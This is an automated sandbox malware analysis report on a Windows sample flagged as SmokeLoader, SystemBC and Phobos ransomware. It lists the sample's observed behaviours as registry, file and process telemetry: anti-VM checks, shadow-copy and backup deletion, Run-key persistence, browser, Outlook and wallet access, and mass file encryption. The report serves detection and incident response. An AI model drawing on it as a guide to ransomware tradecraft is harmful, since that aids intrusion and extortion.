Malware Analysis Report

2024-11-16 12:14

Sample ID 230625-mffepseg21
Target e142f4e8eb3fb4323fb377138.exe
SHA256 e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0
Tags
smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e142f4e8eb3fb4323fb377138f53db66e3e6ec9e82930f4b23dd91a5f7bd45d0

Threat Level: Known bad

The file e142f4e8eb3fb4323fb377138.exe was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida

Phobos

SystemBC

SmokeLoader

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Deletes shadow copies

Modifies boot configuration data using bcdedit

Renames multiple (407) files with added filename extension

Deletes backup catalog

Downloads MZ/PE file

Blocklisted process makes network request

Modifies Windows Firewall

Executes dropped EXE

Checks computer location settings

Checks BIOS information in registry

Themida packer

Obfuscated with Agile.Net obfuscator

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Drops desktop.ini file(s)

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

outlook_win_path

outlook_office_path

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-25 10:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-25 10:24

Reported

2023-06-25 10:26

Platform

win7-20230621-en

Max time kernel

150s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2028 set thread context of 1304 N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A N/A N/A (62 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

Network

N/A

Files

memory/2028-54-0x00000000001C0000-0x00000000001D5000-memory.dmp

memory/1304-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1304-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2028-57-0x0000000000260000-0x0000000000269000-memory.dmp

memory/1304-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1264-59-0x00000000025D0000-0x00000000025E6000-memory.dmp

memory/1304-60-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 10:24

Reported

2023-06-25 10:26

Platform

win10v2004-20230621-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (407) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sv.bat.exe N/A

Drops startup file

Description Indicator Process Target
File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\EA96.exe C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A (7 identical rows)

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A (4 identical rows)

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe" C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EA96 = "C:\\Users\\Admin\\AppData\\Local\\EA96.exe" C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe" C:\Users\Admin\AppData\Local\Temp\D5D3.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\E4D8.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\AppPackageLargeTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-24_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Search.api.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Entities C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\vccorlib140.dll C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\InstallRedo.jtx C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_duplicate_plugin.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-72_contrast-white.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\EduWorks Data Streamer Add-In\MicrosoftDataStreamerforExcel.vsto.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.contrast-white_targetsize-96.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSplashLogo.scale-250.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\WideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Sigma\Entities C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\FrequentOfficeUpdateSchedule.xml C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80_altform-unplated_contrast-black.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\SmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\larrow.gif.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessPipcDemoR_BypassTrial365-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-16_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoDev.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected.svg C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\VideoLAN\VLC\skins\winamp2.xml.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.bg-bg.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WORD_WHATSNEW.XML C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-36_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as80.xsl.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libmft_plugin.dll C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\PointerIndicatorPixelShader.cso C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-private-l1-1-0.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL022.XML C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\MedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\Example2.Diagnostics\1.0.1\Example2.Diagnostics.psd1 C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Exchange.WebServices.dll.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Cartridges\trdtv2r41.xsl.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-48_contrast-black.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-250.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-pl.xrm-ms.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_sv.dll C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\eml.scale-48.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File created C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms.id[2A5E155A-3483].[[email protected]].8base C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\EnsoUI\id_arrow_black.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\Icons\icon_play_prs.png C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\EA96.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A N/A N/A (62 identical rows)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e142f4e8eb3fb4323fb377138.exe N/A
N/A N/A N/A N/A (30 identical rows)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EA96.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D5D3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
